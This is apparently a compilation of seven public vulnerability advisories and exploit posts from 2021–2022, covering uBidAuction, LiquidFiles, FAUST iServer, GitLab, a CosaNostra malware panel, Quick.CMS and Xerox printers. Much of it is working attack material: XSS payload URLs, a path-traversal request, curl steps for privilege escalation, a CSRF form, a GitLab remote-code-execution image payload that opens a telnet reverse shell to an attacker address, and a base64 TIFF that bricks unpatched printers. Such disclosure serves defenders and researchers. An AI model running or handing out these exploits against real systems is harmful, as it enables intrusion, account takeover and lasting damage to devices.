<pre><code>Document Title:<br />===============<br />uBidAuction v2.0.1 - Multiple XSS Web Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2289<br /><br /><br />Release Date:<br />=============<br />2022-01-21<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2289<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.4<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Non Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />uBidAuction is a powerful, scalable & fully-featured classic and bid auction software that lets create the ultimate<br />profitable online auctions website. It allows to manage entire online auction operation: create new auctions within<br />seconds, view members auctions and use the auction extension settings tool.<br /><br />(Copy of the Homepage:https://www.apphp.com/codemarket/items/48/ubidauction-php-classic-and-bid-auctions-script )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple non-persistent cross site web vulnerabilities in the uBidAuction v2.0.1 script web-application.<br /><br /><br />Affected Product(s):<br />====================<br />ApPHP<br />Product: uBidAuction v2.0.1 - Auction Script (PHP) (Web-Application)<br />Product: ApPHP MVC Framework v1.2.2 (Framework)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-09-01: Researcher Notification & Coordination (Security Researcher)<br />2022-09-02: Vendor Notification (Security Department)<br />2022-09-07: Vendor Response/Feedback (Security Department)<br />2022-**-**: Vendor Fix/Patch (Service Developer Team)<br />2022-**-**: Security Acknowledgements (Security Department)<br />2022-01-21: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Pre Auth (No Privileges or Session)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Responsible Disclosure<br /><br /><br />Technical Details & Description:<br />================================<br />Multiple non-persistent cross site web vulnerabilities has been discovered in the official uBidAuction v2.0.1 script web-application.<br />The vulnerability allows remote attackers to inject own malicious script codes with non-persistent attack vector to compromise browser<br />to web-application requests from the client-side.<br /><br />The cross site web vulnerabilities are located in the `date_created`, `date_from`, `date_to` and `created_at` parameters of the `filter` web module.<br />The injection point is located in the parameters and the execution occurs in the filter module. The request method to inject the malicious script<br />code is GET and the attack vector of the vulnerability is non-persistent on client-side.<br /><br />Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects<br />to malicious source and non-persistent manipulation of affected application modules.<br /><br />Request Method(s):<br />[+] GET<br /><br />Vulnerable Module(s):<br />[+] ./orders/myOrders<br />[+] ./auctions/myAuctions/status/active<br />[+] ./auctions/myAuctions/status/loose<br />[+] ./posts/manage<br />[+] ./news/manage<br />[+] ./tickets/manage<br />[+] ./auctions/manage<br />[+] ./backend/mailingLog/manage<br /><br />Vulnerable Parameter(s):<br />[+] date_created<br />[+] date_from<br />[+] date_to<br />[+] created_at<br /><br />Affected Module(s):<br />[+] Filter<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without account and with low user interaction.<br />For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.<br /><br /><br />Exploitation: Payload<br />"><iframe+src%3Devil.source+onload</iframe><br /><br /><br />Exploitation: PoC (Role: Member)<br />https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter<br /><br /><br />Exploitation: PoC (Role: Admin)<br />https://bid-auction.localhost:8080/posts/manage?post_header=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/news/manage?news_header=1&created_at=%22%3E%3Ciframe%20src=evil.source%20onload=alert(document.cookie)%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/tickets/manage?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=1&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/tickets/manage/status/opened?topic=a&message=a&first_name%2Clast_name=a&departments=0&status=0&date_created=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&but_filter=Filter<br />https://bid-auction.localhost:8080/auctions/manage?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=1&category_id=4&status=0&but_filter=Filter<br />https://bid-auction.localhost:8080/backend/mailingLog/manage?email_subject=a&email_content=b&email_from=c&email_to=d&sent_at=%22%3E%3Ciframe+src%3Devil.source+onload&status=&but_filter=Filter<br /><br /><br />Vulnerable Source: ./mailingLog<br /><div class="content"><br /><a href="posts/add" class="add-new">Add Post</a><div class="filtering-wrapper"><br /><form id="frmFilterPosts" action="posts/manage" method="get"><br />Post Header: <input id="post_header" style="width:100px;" maxlength="255" type="text" value="avd" name="post_header"><br />Date Created: <input id="created_at" maxlength="255" style="width:80px;" type="text" value=""><iframe src="evil.source" onload="alert(document.cookie)">" name="created_at" /><div class="buttons-wrapper"><br /><input name="" class="button white" onclick="jQuery(location).attr('href','https://bid-auction.localhost:8080/posts/manage');" type="button" value="Cancel" /><br /><input name="but_filter" type="submit" value="Filter" /><br /></div></form></div><br /><br /><br />--- PoC Session Logs (GET) ---<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from="><iframe+src%3Devil.source+onload&date_to="><iframe+src%3Devil.source+onload&auction_type_id=1&category_id=1&status=&but_filter=Filter<br />Host:www.bid-auction-script.com<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Connection: keep-alive<br />Referer:https://bid-auction.localhost:8080/auctions/myAuctions<br />Cookie: apphp_2j9tuqddrg=v1as9gj4qqhakbpgthnrs34np7<br />-<br />GET: HTTP/1.1 200 OK<br />Server: Apache<br />Vary: Accept-Encoding<br />Content-Encoding: gzip<br />Content-Length: 4542<br />Connection: Keep-Alive<br />Content-Type: text/html; charset=utf-8<br /><br /><br />Reference(s):<br />https://bid-auction.localhost:8080/posts/manage<br />https://bid-auction.localhost:8080/orders/myOrders<br />https://bid-auction.localhost:8080/backend/mailingLog/manage<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/loose<br />https://bid-auction.localhost:8080/auctions/myAuctions/status/active<br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The vulnerability can be resolved by a filter or secure encode of the vulnerable date_created, date_from, date_to and created_at parameters.<br />Disallow the usage of special chars in the affected parameters on get method requests.<br />Sansitize the vulnerable output location to resolve the point of execution in the filter module.<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains:www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to get a ask permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>===============================================================================<br /> title: LiquidFiles Privilege Escalation<br /> product: LiquidFiles v3.5.13<br /> vulnerability type: Privilege Escalation<br /> severity: Medium<br /> CVSSv3 score: 6.7<br /> CVSSv3 vector: AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L<br /> found: 2021-10-29<br /> by: Riccardo Spampinato, Eliana Cannella, Valerio<br />Casalino<br />===============================================================================<br /><br />[EXECUTIVE SUMMARY]<br />LiquidFiles is a secure file transfer system for person-to-person email<br />communication.<br />During an engagement for our customer we discovered a Privilege Escalation<br />from "User Admin" user to "System Administrator" user.<br />Using LiquidFiles API, a "User Admin" user can list all the application<br />registered users, retrieving information such as their API keys, including<br />those of the System Administrators. As per LiquidFiles documentation, API<br />key is used as HTTP basic authentication in order to authenticate to the<br />LiquidFiles system.<br />A malicious "User Admin" user, by using a 'System Administrator's API key,<br />can obtain the role of System Administrator and can administer all aspects<br />of the LiquidFiles system.<br />The impact of a successful attack includes: obtaining access to all aspects<br />of the LiquidFiles system of the application via the System Administrator<br />API key.<br /><br /><br />[VULNERABLE VERSIONS]<br />The following version of LiquidFiles system is affected by the<br />vulnerability; previous versions may be vulnerable as well:<br />- LiquidFiles v3.5.13<br /><br /><br />[TECHNICAL DETAILS]<br />It is possible to reproduce the issue following these steps:<br />1. Get the API key of your own user-admins user;<br />2. With your own user-admins user's API key, get a sysadmins' API key via<br />/admin/users API;<br />3. With sysadmins' API key retrieved at the step below, issue<br />/admin/users/<user-admins_user_id> API modifying the group of your<br />user-admins user from "user-admins" to "sysadmins";<br />4. You are now a sysadmins user. You can verify it by either login again<br />with your own user via web GUI (you are now prompted to set a fallback<br />password to use in case LDAP authentication fails) or by issuing<br />/admin/users/<user-admins_user_id> API to view your own user.<br /><br /><br />Below a full transcript of the HTTP requests and responses used to raise<br />the vulnerability:<br /><br />1. Get the API key of your own user-admins user<br /><br />cURL Request:<br />curl -X POST -H "Accept: application/json" -H "Content-Type:<br />application/json" -d<br />'{"user":{"email":"[user-admins_user_mail]","password":"[CENSORED]"}}'<br />https://[CENSORED]/login<br /><br />Response:<br />{"user":{"api_key":"[user-admins_user_API_key]"}}<br /><br /><br />2. Get a sysadmins' API key<br /><br />cURL Request:<br />curl -s -X GET --user "[user-admins_user_API_key]:x" -H "Accept:<br />application/json" -H "Content-Type: application/json" https://<br />[CENSORED]/admin/users<br /><br />Response:<br />[TRUNCATED]<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[sysadmins_user_API_key]",<br /> "ldap_authentication": "false",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-10-29 10:02:11 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2020-06-30 10:49:38 UTC"<br /> }<br />},<br />[TRUNCATED]<br /><br /><br />3. Modify the group of your own user-admins user from "user-admins" to<br />"sysadmins"<br /><br />cURL Request:<br />cat <<EOF | curl -s -X PUT --user "[sysadmins_user_API_key]:x" -H "Accept:<br />application/json" -H "Content-Type: application/json" -d @- https://<br />[CENSORED]/admin/users/<user-admins_user_id><br />{"user":<br /> {<br /> "name": "[user-admins_user_name]",<br /> "group": "sysadmins"<br /> }<br />}<br />EOF<br /><br />Response<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[CENSORED]",<br /> "ldap_authentication": "true",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-11-03 13:31:58 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2021-03-03 11:48:37 UTC"<br /> }<br />}<br /><br /><br />4. Verify that your own user-admins user is now a sysadmins one.<br /><br />cURL Request<br />curl -X GET -H "Accept: application/json" -H "Content-Type:<br />application/json" --user [user-admins_user_API_key]:x https://<br />[CENSORED]/admin/users/<user-admins_user_id><br /><br />Response<br />{"user":<br /> {<br /> "id": "[CENSORED]",<br /> "email": "[CENSORED]",<br /> "name": "[CENSORED]",<br /> "group": "sysadmins",<br /> "max_file_size": 0,<br /> "filedrop": "disabled",<br /> "filedrop_email": "disabled",<br /> "api_key": "[CENSORED]",<br /> "ldap_authentication": "true",<br /> "locale": "",<br /> "time_zone": "",<br /> "strong_auth_type": "",<br /> "strong_auth_username": "",<br /> "delivery_action": "",<br /> "phone_number": "",<br /> "last_login_at": "2021-11-03 13:34:36 UTC",<br /> "last_login_ip": "[CENSORED]",<br /> "created_at": "2021-03-03 11:48:37 UTC"<br /> }<br />}<br /><br /><br />[VULNERABILITY REFERENCE]<br />The following CVE ID was allocated to track the vulnerabilities:<br />CVE-2021-43397<br /><br /><br />[DISCLOSURE TIMELINE]<br />2021-11-02 Vulnerability submitted to vendor through vendor support portal.<br /> Vendor requested more info and acknowledged the problem later.<br />2021-11-04 Researcher requested to allocate a CVE number.<br /> Vendor released a fix for the reported issue.<br />2021-11-09 Researcher requested to publicly disclose the issue; public<br /> coordinated disclosure.<br /><br /><br />[MITIGATION]<br />As per vendor suggestion, the vulnerability could be mitigated in versions<br />prior to 3.6.3 by disabling API in Admins groups.<br /><br /><br />[SOLUTION]<br />Version 3.6.3 (released 2021-11-09)<br />https://man.liquidfiles.com/release_notes/version_3-6-x.html<br /><br /><br />[NOTE]<br />Please note that the issue described in this advisory can be also raised<br />via Web GUI LiquidFiles Admin panel.<br /><br /><br />[CONTACT DETAILS]<br />Riccardo Spampinato riccardo.spampinato@mail-bip.com +39 348 725 8746<br />Eliana Cannella eliana.cannella@mail-bip.com +39 345 762 2019<br />Valerio Casalino valerio.casalino@mail-bip.com +39 348 824 9794<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220120-0 ><br />=======================================================================<br /> title: Local file inclusion vulnerability<br /> product: Land Software - FAUST iServer<br /> vulnerable version: 9.0.017.017.1-3 - 9.0.018.018.4<br /> fixed version: 9.0.019.019.7, Version 10<br /> CVE number: CVE-2021-34805<br /> impact: high<br /> homepage: https://www.land-software.de<br /> found: 2021-05-25<br /> by: Mario Keck (Atos Germany)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />(German) "Der FAUST iServer bringt Ihre FAUST- , FAUST Entry- und LIDOS-Datenbanken<br />ins Intranet und Internet. Er bietet hohe Sicherheit und eine einfache<br />Installation."<br /><br />Source: http://www.land-software.de/lfs.fau?prj=iweb&dn=faust+iserver<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a hotfix for the identified vulnerable versions. As the<br />most actual version v10 of FAUST iServer is not vulnerable, no immediate action in<br />the form of a patch is required. The webroot of the server should not be on the<br />same partition as the operating system's root partition.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Local File Inclusion (CVE-2021-34805)<br />When a URL is requested, the FAUST iServer checks for the corresponding ".fau"<br />file on the operating system. ".fau" files can be compared with compiled<br />webserver pages for displaying the content of the webpage. The identified<br />vulnerable versions of FAUST iServer do not properly protect against a request<br />aiming to read local files of the operating system.<br /><br />FAUST iServer is designed to work on Windows operating systems only.<br />Therefore, by simply URL-encoding a path like<br />..\..\..\windows\win.ini into %2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini<br />the FAUST iServer returns the contents of win.ini<br /><br /><br />Proof of concept:<br />-----------------<br />1) Local File Inclusion (CVE-2021-34805)<br />The following proof of concept shows the HTTP request that was used to read<br />local files of the server's operating system.<br />The vulnerability, as shown in the proof of concept request below, can be<br />triggered as soon as a vulnerable version of FAUST iServer is in use. To read<br />operating system specific files, the webroot of FAUST iServer has to be located<br />on the same partition as the operating system root.<br />Authorization is not needed.<br /><br />-------------------------------------------------------------------------------<br />HTTP Request:<br />GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini HTTP/1.1<br />User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko<br />Connection: keep-alive<br />Host: <IP><br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.9<br />-------------------------------------------------------------------------------<br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions have been tested and found to be vulnerable:<br />* 9.0.017.017.1-3<br />* 9.0.018.018.4<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2021-06-10: Contacting vendor via email.<br />2021-06-14: Vendor requested more information about the vulnerability, which<br /> was provided on the same day.<br />2021-06-15: Requested information from vendor to check which versions are<br /> vulnerable.<br />2021-06-17: Vendor informed researcher about upcoming update and promised to<br /> inform all customers about the critical security fix in it.<br />2021-08-09: Confirmed the security fix in FAUST iServer 9.0.019.019.7.<br />2021-08-16: Researcher received a notification mail from the vendor's<br /> newsletter announcing the official release of the fixed version.<br />2022-01-12: Version 10 was officially released and is available for all<br /> customers for upgrade.<br />2022-01-20: Release of security advisory<br /><br /><br />Solution:<br />---------<br />The vulnerability is fixed in the following version:<br />* 9.0.019.019.7<br /><br />This patch should be immediately installed.<br /><br />Version 10 is not affected by this vulnerability, if possible it is recommended<br />to upgrade to this version.<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Mario Keck / @2022<br /><br /><br /></code></pre>
<pre><code># Exploit Title: GitLab 13.10.2 - Remote Code Execution (RCE) (Unauthenticated)<br /># Shodan Dork: https://www.shodan.io/search?query=title%3A%22GitLab%22+%2B%22Server%3A+nginx%22<br /># Date: 11/01/2021<br /># Exploit Author: Jacob Baines<br /># Vendor Homepage: https://about.gitlab.com/<br /># Software Link: https://gitlab.com/gitlab-org/gitlab<br /># Version: GitLab Community Edition and Enterprise Edition before 13.10.3, 13.9.6, and 13.8.8<br /># Tested on: GitLab Community Edition 13.10.2 and 13.10.1 (Ubuntu)<br /># CVE : CVE-2021-22205<br /># Vendor Advisory: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/<br /># Root Cause Analysis: https://attackerkb.com/topics/D41jRUXCiJ/cve-2021-22205/rapid7-analysis?referrer=activityFeed<br /><br />Code execution is the result of GitLab allowing remote unauthenticated attackers to provide DjVu files to ExifTool (see: CVE-2021-22204). As such, exploitation of GitLab takes two steps. First generating the payload and then sending it.<br /><br />1. Generating the payload. This generates a DjVu image named lol.jpg that will trigger a reverse shell to 10.0.0.3 port 1270.<br /><br />echo -e<br />"QVQmVEZPUk0AAAOvREpWTURJUk0AAAAugQACAAAARgAAAKz//96/mSAhyJFO6wwHH9LaiOhr5kQPLHEC7knTbpW9osMiP0ZPUk0AAABeREpWVUlORk8AAAAKAAgACBgAZAAWAElOQ0wAAAAPc2hhcmVkX2Fubm8uaWZmAEJHNDQAAAARAEoBAgAIAAiK5uGxN9l/KokAQkc0NAAAAAQBD/mfQkc0NAAAAAICCkZPUk0AAAMHREpWSUFOVGEAAAFQKG1ldGFkYXRhCgkoQ29weXJpZ2h0ICJcCiIgLiBxeHs="<br />| base64 -d > lol.jpg<br />echo -n 'TF=$(mktemp -u);mkfifo $TF && telnet 10.0.0.3 1270 0<$TF | sh 1>$TF' >> lol.jpg<br />echo -n<br />"fSAuIFwKIiBiICIpICkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCg=="<br />| base64 -d >> lol.jpg<br /><br />2. Sending the payload. Any random endpoint will do.<br /><br />curl -v -F 'file=@lol.jpg' http://10.0.0.7/$(openssl rand -hex 8)<br /><br />2a. Sample Output from the reverse shell:<br /><br />$ nc -lnvp 1270<br />Listening on [0.0.0.0] (family 0, port 1270)<br />Connection from [10.0.0.7] port 1270 [tcp/*] accepted (family 2, sport<br />34836)<br />whoami<br />git<br />id<br />uid=998(git) gid=998(git) groups=998(git)<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/61285c988de52b7c067fb2e703f2ab83_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: CosaNostra Builder WebPanel <br />Vulnerability: Insecure Crypto<br />Description: The password for the panel is stored in MySQL database using an insecure MD5 hash algorithm and no salt. MD5 is a basic purpose fast hash (not slow) and not using salt allows attackers that gain access to the hash ability to conduct faster cracking attacks using pre-computed dictionaries.<br />Type: WebUI<br />MD5: 61285c988de52b7c067fb2e703f2ab83<br />Vuln ID: MVID-2022-0472<br />Disclosure: 01/24/2022<br /><br />Exploit/PoC:<br />id user password<br />1 admin 21232f297a57a5a743894a0e4a801fc3<br /><br />Default password is "admin".<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Quick.CMS 6.7 - Cross-site request forgery (CSRF) to<br />Cross-site Scripting (XSS) (Authenticated)<br /># Date: 2021-04-21<br /># Exploit Author: Rahad Chowdhury<br /># Vendor Homepage: https://opensolution.org/<br /># Software Link:<br />https://opensolution.org/download/home.html?sFile=Quick.Cms_v6.7-en.zip<br /># Version: 6.7<br /># Tested on: Windows 8.1, Kali Linux, Burp Suite<br /><br />Steps to Reproduce:<br />Steps to Reproduce:<br /><br />1. At first login your panel<br />2. then click the "Sliders" menu to "New Slider"<br />3. now intercept with the burp suite and save a new slider<br />4. Then use XSS payload </textarea><script>alert(document.domain)</script><br />in sDescription value.<br />5. Now Generate a CSRF POC<br /><br /><!DOCTYPE html><br /><html><br /><body><br /> <form action="http://127.0.0.1/admin.php?p=sliders-form" method="POST"><br /> <input type="hidden" name="iSlider" value=""><br /> <input type="hidden" name="aFile" filename=""><br /> <input type="hidden" name="sFileNameOnServer" value="slider_2.jpg"><br /> <input type="hidden" name="sDescription"<br />value="test</textarea><script>alert(document.cookie)</script>"><br /> <input type="hidden" name="iPosition" value="1"><br /> <input type="hidden" name="sOption" value="save"><br /> <input type="submit" value="submit"><br /> </form><br /></body><br /></html><br /></code></pre>
<pre><code>[+] Credits: Mahmoud Al-Qudsi<br />[+] Website: https://neosmart.net/<br />[+] Source: https://neosmart.net/blog/?p=4865<br />[+] Media: https://twitter.com/mqudsi and https://twitter.com/neosmart<br /><br />[Vendor]<br />Xerox Corporation<br /><br />[Product]<br />Xerox Versalink printers, other Xerox printers/copiers.<br /><br />[Vulnerability Type]<br />Remote denial-of-service leading to bricked device.<br /><br />[Security Issue]<br />A specifically crafted TIFF payload may be submitted to the printer's job queue<br />(in person or over the network) by unauthenticated/unprivileged users or network<br />or internet attackers by means of a JavaScript payload. The device will panic<br />upon attempting to read the submitted file and a physical reboot will be<br />required. Upon reboot, the device will attempt to resume the last-printed job,<br />triggering the panic once more. The process repeats ad-infinitum.<br /><br />[Exploit/PoC]<br />Extract the TIFF contents of the base64-encode archive below and submit directly<br />to the job queue on a vulnerable printer to trigger the exploit:<br /><br />UmFyIRoHAQAzkrXlCgEFBgAFAQGAgAD5BbdHEwMC5QAE5QAA9kPUNIAAAANDTVRYZXJveCByZW1v<br />dGUgYnJpY2sgcGF5bG9hZCBieSBNYWhtb3VkIEFsLVF1ZHNpDQpTZWUgaHR0cHM6Ly9uZW9zbWFy<br />dC5uZXQvYmxvZy8/cD00ODY1IGZvciBtb3JlIGluZm8uAOsG2ysrAgMLjQEEvAMgCd+uuYADAA94<br />ZXJveCBicmljay50aWYKAwIA/Fsg4nPVAcISiiBENSb2YDSTz9+g+ofkEQVoaUFeJvK3kDY8WbGp<br />HgjY0bFPe8gzgjwjaJNmzSGzlGGm0ZRkySYEISicQttsKElCEti8EbSsdkcDz6/WmRz/N1o/EIEf<br />YPQUn+fPO4RLXjWeRbJT8isQTI5AnW6pF0WsD5DaxM4tgNHp3U7xR1fsHuvMYwMeDGyHIB13VlED<br />BQQA<br /><br />[Network Access]<br />Local or remote<br /><br />The sample payload may also be submitted to exploit a Xerox printer with a known<br />ip address or host name over the web by taking advantage of the unprotected HTTP<br />POST interface exposed by the device on its network interface.<br /><br />[Severity]<br />Critical<br /><br />The denial-of-service attack results in a semi-permanent "bricking" of the Xerox<br />printer. Recovery may be possible if there are unapplied firmware updates by<br />forcing an update over the network, which clears the job queue in the process.<br />Otherwise, manually clearing the non-volatile storage memory on the device's<br />mainboard is required to break out of the loop.<br /><br />[Disclosure Timeline]<br />- September 26, 2019: Reported to Xerox<br />- January 14, 2020: Confirmed by Xerox in response to a request for updates<br />- January 25, 2022: Publicly disclosed, remains unpatched and exploitable<br /><br />Mahmoud<br /><br /><br /><br /></code></pre>
